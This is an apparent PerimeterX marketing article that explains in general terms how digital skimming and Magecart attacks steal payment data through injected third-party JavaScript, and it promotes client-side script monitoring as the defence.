Stop Digital Skimming And Magecart Attacks with PerimeterX

Digital skimming is a major cybersecurity threat to websites. Often called e-skimming or online card skimming, a digital skimming attack steals credit card information or payment card data from visitors to your online store. Retailers and banks have experienced physical skimming where the attackers install stealthy credit card skimmer devices to ATM machines or point-of-sale terminals to steal credit card or debit card numbers and PINs. Digital skimmers do the same thing on e-commerce websites and skim payment data from input fields on existing payment forms or hijack unsuspecting users to fake checkout pages. Formjacking was the term originally used when hackers modified forms on web servers and collected PII data which led to cybersecurity data breaches.

Attackers take advantage of the security weaknesses in website Shadow Code including third-party JavaScript and open source libraries. Often they use known zero-day vulnerabilities in third-party JavaScript as an opening to gain access to websites and mobile applications. They may also take advantage of misconfigured permissions on Amazon S3 buckets and GitHub repositories or induce insiders to give them access to website source code. Digital skimmers inject malicious code into the third-party scripts on your website and steal credit card data. These attacks are also called website supply chain attacks since the main threat comes from the third-, fourth- or fifty-party scripts and libraries used by websites.

Magecart is a style of digital skimming attack on web and mobile applications and a major cybersecurity threat to e-commerce sites. Magecart attacks target websites and e-commerce platforms such as Magento to steal personal data, usually credit card payment data. In the British Airways attack, for example, a Magecart group of attackers modified an existing JavaScript to skim customer payment information unbeknownst to the users or British Airways. Website operators have no visibility into what happens inside their users’ browsers when their client-side code is changed. Users remain unaware since these attacks usually do not change the functionality of the site.

Magecart hackers inject a ‘skimmer’ – an unwanted piece of JavaScript code into checkout pages or modify paths to checkout pages to skim sensitive information. Magecart attackers also use obfuscation techniques to hide the skimmer code and geofence their target website to a country or region in order to evade detection.

The injected code waits for users to fill out forms with their credit card numbers or other customer data. The information is transmitted directly from the user’s browser/device to a site controlled by the attacker. Once they have stolen this data, cybercriminals are free to go shopping on the users’ accounts or resell the card information on the dark web.

As online shopping continues to grow, so do cybercrimes and Magecart attacks. Within a 12-month period from 2017 to 2018, Magecart, a loosely organized group of cybercriminals, breached more than 12 third-party software vendors leading to supply chain attacks. For today’s e-commerce companies, digital skimming is the new normal. In 2019, British Airways was fined $230 million in regulatory penalties - all stemming from a Magecart attack in 2017.

For hackers, this type of attack brings in big profits with very little effort. In one reported case, the attack was as simple as a single line of JavaScript that loaded a malicious script used to carry out a card skimming attack on thousands of websites.

The majority of digital skimming attacks target third-party content management systems and online shopping cart systems such as Magento. Merchants rely on them to make their e-commerce sites more seamless and user-friendly. But these third-party tools are under constant attack by digital skimmers looking to exploit their security vulnerabilities.

To avoid detection, attackers will hide malicious code inside good code. Merchants and customers might be unaware of the malware or the data breach for days or even months in some cases. As of October 2019, none of the cybercriminals responsible for Magecart attacks have been caught.

Traditional cybersecurity solutions like Web Application Firewalls are not enough to protect the client-side against digital skimming and Magecart attacks. Some companies are placing their bets on static scanning of their site, not realizing the dynamic nature of Magecart attacks. Solutions like sandboxing create significant hurdles in the website development process and break continuous integration/continuous deployment cycles. Content security policies (CSP) are also the first resort for many web application security professionals. CSPs, originally used for protection against cross-site script execution, need a lot of tuning. CSPs alone don’t provide any protection against a compromise of a trusted domain that can be used to inject a skimmer on the website.

Modern client-side application security solutions can continuously monitor all the scripts on your website for anomalous behavior, and automatically groom CSP rules that can stop digital skimming and Magecart attacks.